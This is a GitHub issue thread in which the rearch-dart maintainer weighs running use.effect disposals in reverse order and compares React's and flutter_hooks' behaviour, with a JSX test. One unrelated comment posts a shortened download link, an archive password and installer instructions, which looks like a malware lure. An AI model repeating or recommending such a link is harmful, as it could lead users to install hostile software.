### ISSUE TITLE
Consider running `use.effect` disposals in reverse order

### ISSUE THREAD

**Issue by GregoryConrad** [GregoryConrad/rearch-dart#213]
Reason being: often, a `use.effect` uses the resources created from somewhere before it in the function. Thus, when you have multiple `use.effect`s in the same function, they are naturally in a topological ordering, and a user would likely want their disposals to run in reverse (so leaf resources are disposed first).

Disposal order is not currently guaranteed, so this issue is tracking:
- Whether to do disposals in reverse (i.e., see what React Hooks or `flutter_hooks` are doing)
- Make the change to run in reverse order (if applicable)
- Stabilize the fact that they are disposed in reverse.

As a result, we would need:
- 2 new tests (one for capsules, one for widgets)
- doc updates on both capsule/widget side effect APIs
- doc updates on use.effect
- to refactor capsule/widgets implementations w.r.t. disposals
  - i.e. `while (disposals) disposals.pop().call();`

See https://github.com/GregoryConrad/rearch-dart/issues/212#issuecomment-2312918788 for context. CC @busslina

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by GregoryConrad** [comment]
Looked into this a bit.

## Findings

### React
I tested the following to see what React does:
```jsx
import {React, useEffect, useState} from 'react';

export function App(props) {
  const [count, setCount] = useState(0);
  const incrementCount = () => setCount(count+1);
  if (count % 2 === 1) {
    return (
      <div className='App'>
        <Thing />
        <button onClick={incrementCount} />
      </div>
    );
  }
  return (
    <div className='App'>
      <h1>Hello React.</h1>
      <h2>Start editing to see some magic happen!</h2>
      <button onClick={incrementCount} />
    </div>
  );
}

export function Thing(props) {
  const [count, setCount] = useState(0);
  const incrementCount = () => setCount(count+1);
  useEffect(() => {
    return () => console.log('1');
  }, [count]);
  useEffect(() => {
    return () => console.log('2');
  }, [count]);
  useEffect(() => {
    return () => console.log('3');
  }, [count]);
  return (
    <div>
      <p>{count}</p>
      <button onClick={incrementCount} />
    </div>
  );
}
```

Prints:
```
1
2
3
```
For both unmount/disposal and when the key list changes between builds.

Which indicates they're executed in-order in React (which is what I _believe_ ReArch currently does--I'd have to check).

### `flutter_hooks`
I think `flutter_hooks` actually does what this issue suggests:
- https://github.com/rrousselGit/flutter_hooks/blob/319679b4ff8e4e224b3d9c29fd138623f750a24d/packages/flutter_hooks/test/hook_widget_test.dart#L97
- https://github.com/rrousselGit/flutter_hooks/blob/319679b4ff8e4e224b3d9c29fd138623f750a24d/packages/flutter_hooks/test/hook_widget_test.dart#L57


## Thoughts/Discussion
The issue I'm facing is that I would be fine changing the disposal order on widget unmount/dispose, but _not when the keys change_.

It would be exceptionally tricky to implement reverse-order disposal on key changes, and I'm frankly not sure that would be ideal (users may expect the disposal from a key change to run directly before the next line of code executes).

If I added the final Widget unmount/disposal reverse-order change _but not for key changes_, users may expect the key change disposal to also be in reverse order too, which would cause confusion.

So I don't see a proper path forward at the moment. If someone comes across this later on and thinks they have a sound argument one way or the other, I'd be happy to discuss.

**Comment by busslina** [comment]
I think we can keep it in-order and deal manually with those little issues we can find.
